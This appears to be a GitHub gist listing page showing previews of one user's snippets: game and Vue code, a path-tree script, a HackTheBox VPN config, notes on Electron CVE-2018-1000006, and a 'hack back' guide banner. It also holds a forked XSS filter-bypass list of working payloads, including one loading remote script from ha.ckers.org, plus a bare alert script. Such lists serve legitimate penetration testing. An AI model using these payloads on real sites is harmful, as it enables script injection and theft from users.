- 【CVE-2018-1000006】
- 参考资料:
- 后来,补上的一篇,考古资料:
- Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
- 讲了很多,其它的【奇门相关方法】。
- 可直接上手复现,的Demo环境:
- Electron,在【1.8.2】及更早版本,在【协议处理程序】中 存在漏洞。
- 特别是,在 Win10 、Win7 、 Windows 2008 上,运行的Electron程序,可以【注册自定义协议处理程序】
hanshou101
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Learn cc.Class: | |
| // - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/class.html | |
| // - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/class.html | |
| // Learn Attribute: | |
| // - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/reference/attributes.html | |
| // - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/reference/attributes.html | |
| // Learn life-cycle callbacks: | |
| // - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/life-cycle-callbacks.html | |
| // - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/life-cycle-callbacks.html |
hanshou101
/ GameAbstract_FrameWork.ts
Created
April 19, 2019 04:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * 此处,尝试对德州的游戏,进行 框架的抽取。 | |
| */ | |
| declare namespace AbstractGame { | |
| /*进入房间*/ | |
| interface EnterRoom { | |
| initRoom(): void;//整个房间初始化 | |
| initRunningRound(): void;//若当前牌局进行中 | |
| initXiuxiRound(): void;//若当前牌局休息中 |
hanshou101
/ agent-config.vue
Created
April 22, 2019 07:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 当前用户不是经纪商 | |
| if (this.userDetail.isAgent == 0) { | |
| if (this.setNewcomer == '0') { | |
| // 修改当前普通用户经纪商信息 | |
| const postData = {} | |
| postData.agentId = this.ruleForm.parentId | |
| postData.userId = this.ruleForm.userId | |
| res = await this.userApi.agentApi.createNormalAgent(postData) | |
| } else { | |
| // 修改当前用户为经纪商 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 缩放 放大事件 | |
| _pinchout(e) { | |
| let now = new Date().getTime(); | |
| let offset = tool.offset(this.$refs.touch_com.$el); | |
| if (!this.pinchoutTimer || now - this.pinchoutTimer >= 300) { |
hanshou101
/ index.js
Created
February 20, 2021 05:01
— forked from stephanbogner/index.js
Create tree structure from paths array
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var paths = [ | |
| ["Account"], | |
| ["Account", "Payment Methods"], | |
| ["Account", "Payment Methods", "Credit Card"], | |
| ["Account", "Payment Methods", "Paypal"], | |
| ["Account", "Emails"], | |
| ["Account", "Emails", "Main Email"], | |
| ["Account", "Emails", "Backup Email"], | |
| ["Account", "Devices"], | |
| ["Account", "Devices", "Google Pixel"], |
hanshou101
/ hack back
Created
February 25, 2021 15:29
— forked from fluential/hack back
http://pastebin.com/raw/0SNSvyjJ
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _ _ ____ _ _ | |
| | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |
| | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |
| | _ | (_| | (__| < | |_) | (_| | (__| <|_| | |
| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |
| A DIY Guide | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| client | |
| dev tun | |
| proto udp | |
| remote edge-eu-starting-point-vip-1.hackthebox.eu 1337 | |
| resolv-retry infinite | |
| nobind | |
| persist-key | |
| persist-tun | |
| remote-cert-tls server | |
| comp-lzo |
hanshou101
/ xxsfilterbypass.lst
Created
April 1, 2021 23:26
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
hanshou101
/ xss-alert
Last active
April 27, 2021 08:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(1)</script> |
OlderNewer